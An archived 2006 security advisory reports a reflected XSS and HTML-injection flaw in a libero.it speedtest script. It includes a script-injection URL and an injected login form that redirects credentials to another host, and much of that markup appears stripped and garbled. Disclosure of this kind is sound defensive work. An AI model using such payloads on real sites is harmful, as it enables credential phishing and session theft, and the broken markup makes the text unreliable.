Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Specific Sites :: b06-2014.htm

libero.it XSS vulnerability - HTML injection



libero.it XSS vulnerability - HTML injection
libero.it XSS vulnerability - HTML injection



--Security Report--
Advisory: libero.it XSS vulnerability - HTML injection
---
Author: Davide Denicolo
---
Date: 28/04/06 
---
Contact: davidesecurityinfos.com
---
Vendor: ItaliaOnLine S.r.l (http://www.libero.it) 
Service: Web
Level: Low
---
Description:

Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering
dial-up,Broadband and talk services.
A Broadband service  called "Libero speedtest" is a simple "Bandwidth Speed
Test";
A java applet test, send Bandwidth information to perl script
(print_result_spt.pl) in the GET request and
this perl script simply put parameter in the page as HTML;
an attacker can exploit the vulnerable script to have arbitrary script code
executed in the browser or injects html form so redirect a login
authentication to another web application;

this is a normal HTTP URL:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=868.02&up=220.5 
3&tdown=18875&tup=74297&size 48.0&t=0

this is a XSS URL:

http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up= 
ipt>alert('ciao')&tdown=3455&tup=5107&size 48.0&t=0



and this is an HTML form :

action="http://127.0.0.1">

src="http://www.libero.it/i05/entra_hp.gif" alt="Entra" border="0" height="22" type="image" width="44">

and this is previous form injects in the request:
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up= le%20border="0"%20width="32%"> .1">@libero.it@inwind">ize:8pt">@libero.it@inwind. @iol.it@blu.it">it@iol.it@blu.it< /option>name="T3"%20style="font-size:7pt">

lt="Entra"%20border="0"%20height="22"%20type="image"%20width="44">

< /tr>&tdown=3455&tup=5107&size 48.0&t=0 -- Timeline: * 2/05/2006: Vulnerability found. * 2/05/2006: Unable to contact vendor -- For more information, please send question to: davidesecutityinfos.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH